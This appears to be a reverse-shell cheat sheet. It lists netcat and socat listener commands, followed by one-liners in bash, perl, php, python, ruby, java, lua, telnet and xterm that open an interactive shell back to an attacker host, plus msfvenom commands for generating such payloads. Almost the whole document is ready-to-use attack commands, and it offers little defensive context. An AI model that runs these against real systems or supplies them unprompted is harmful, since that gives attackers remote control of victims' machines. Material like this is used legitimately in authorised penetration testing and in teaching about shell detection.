listen port
nc -lvnp 4444
nc -vvlp 4444
socat version
socat TCP-LISTEN:12345 –
socat reverse shell
/tmp/socat exec: ‘bash -li’,pty,stderr,setsid,sigint,sane tcp:192.168.31.174:12345
bash version
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
OR
bash -c ‘sh -i &>/dev/tcp/210.28.30.887/53 0>&1’
perl version
perl -e ‘use Socket;$i=”10.0.0.1″;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i))))open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’
php version
php -r ‘$sock=fsockopen(“10.0.0.1”,1234);exec(“/bin/sh -i <&3 >&3 2>&3”);’
python version
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.0.0.1”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’
NC version
nc -e /bin/sh 10.0.0.1 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
nc x.x.x.x 8888|/bin/sh|nc x.x.x.x 9999
ruby version
ruby -rsocket -e’f=TCPSocket.open(“[ATTACKER-IP]”,10000).to_i;exec sprintf(“/bin/sh -i <&%d >&%d 2>&%d”,f,f,f)’
java version
r = Runtime.getRuntime()
p = r.exec([“/bin/bash”,”-c”,”exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done”] as String[])
p.waitFor()
lua version
lua -e “require(‘socket’);require(‘os’);t=socket.tcp();t:connect(‘10.0.0.1’,’1234′);os.execute(‘/bin/sh -i <&3 >&3 2>&3’);”
NC version without -e option
mknod /tmp/backpipe p
/bin/sh 0</tmp/backpipe | nc x.x.x.x 4444 1>/tmp/backpipe
/bin/bash -i > /dev/tcp/173.214.173.151/8080 0<&1 2>&1
mknod backpipe p && telnet 173.214.173.151 8080 0backpipe
mknod needs root user, but You can also create a pipeline through mkfifo /tmp/backpipe 。
telnet version
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet [ATTACKER-IP] 10000 >/tmp/f
another bash reverse shell
exec 5<>/dev/tcp/[ATTACKER-IP]/10000;cat <&5 | while read line; do $line 2>&5 >&5; done
xterm version
One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.0.0.1) on TCP port 6001.
xterm -display 10.0.0.1:1
To catch the incoming xterm, start an X-Server (:1 — which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system):
Xnest :1
You’ll need to authorise the target to connect to you (command also run on your host):
xhost +targetip
msfvenom reverse shell
msfvenom -l payloads ‘cmd/unix/reverse’
msfvenom -p cmd/unix/reverse_bash lhost=[ATTACKER-IP] lport=10000 R
msfvenom -p cmd/unix/reverse_netcat lhost=[ATTACKER-IP] lport=10000 R
